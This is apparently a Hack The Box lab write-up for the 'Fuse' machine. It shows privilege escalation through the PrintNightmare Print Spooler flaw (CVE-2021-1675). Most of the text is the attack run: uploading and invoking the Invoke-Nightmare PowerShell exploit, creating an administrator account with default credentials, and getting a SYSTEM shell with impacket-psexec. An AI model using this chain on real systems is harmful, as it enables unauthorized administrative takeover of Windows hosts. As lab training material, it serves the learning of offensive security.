CVE-2021-1675
a vulnerability classified as critical was found in microsoft windows (Operating System). Affected by this vulnerability is an unknown part of the component Print Spooler. As an impact it is known to affect confidentiality, integrity, and availability.
Low privileged users are able to add a printer, and specifically providing a malicious driver for that printer, in which case, results in escalation of privileges, gaining the system level access
Overview of CVE-2021-1675/CVE-2021-34527
Testing
The vulnerability takes advantage of the Windows-native service called Print Spooler that is enabled by default on all Windows machines (servers and endpoints)
The target system running a spoolsv process gave away, and it didn’t seem like there was a patch installed for that.
On top of it, I knew that there is the spooler service running from the MSRPC enumeration way back.
PS C:\tmp> Get-Service Spooler
Status Name DisplayName
------ ---- -----------
Running Spooler Print SpoolerExploit (Invoke-Nightmare.ps1)
i found the exploit online
it’s a powershell implementation of the original printnightmare exploit
Exploitation
*Evil-WinRM* PS C:\tmp> upload CVE-2021-1675/CVE-2021-1675.ps1 C:\tmp\CVE-2021-1675.ps1
Info: Uploading CVE-2021-1675/CVE-2021-1675.ps1 to C:\tmp\CVE-2021-1675.ps1
Data: 238080 bytes of 238080 bytes copied
Info: Upload successful!I transferred the PowerShell script to the target system over the existing WinRM session
*Evil-WinRM* PS C:\tmp> . .\CVE-2021-1675.ps1I then proceeded to import the exploit script to the current PowerShell session
*Evil-WinRM* PS C:\tmp> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\svc-print\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_dcef07064d319714\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\svc-print\AppData\Local\Temp\nightmare.dllExecuting the exploit cmdlet. Successful exploitation should create an administrator user by default
*Evil-WinRM* PS C:\tmp> net users adm1n
User name adm1n
Full Name adm1n
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/2/2023 2:27:48 PM
Password expires Never
Password changeable 2/3/2023 2:27:48 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.The newly created user is indeed part of the administrators group
The credential, by default, is adm1n:P@ssw0rd
┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2021-1675]
└─$ impacket-psexec 'adm1n:P@ssw0rd@$IP' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.193.....
[*] Found writable share ADMIN$
[*] Uploading file YSEbejMK.exe
[*] Opening SVCManager on 10.10.10.193.....
[*] Creating service tLjy on 10.10.10.193.....
[*] Starting service tLjy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
Fuse
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::bb
IPv6 Address. . . . . . . . . . . : dead:beef::786e:10c2:1173:5102
Link-local IPv6 Address . . . . . : fe80::786e:10c2:1173:5102%5
IPv4 Address. . . . . . . . . . . : 10.10.10.193
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
10.10.10.2
Tunnel adapter isatap.{AF2C7A34-A136-4854-894E-84F30DA6C214}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : htbDomain Level Compromise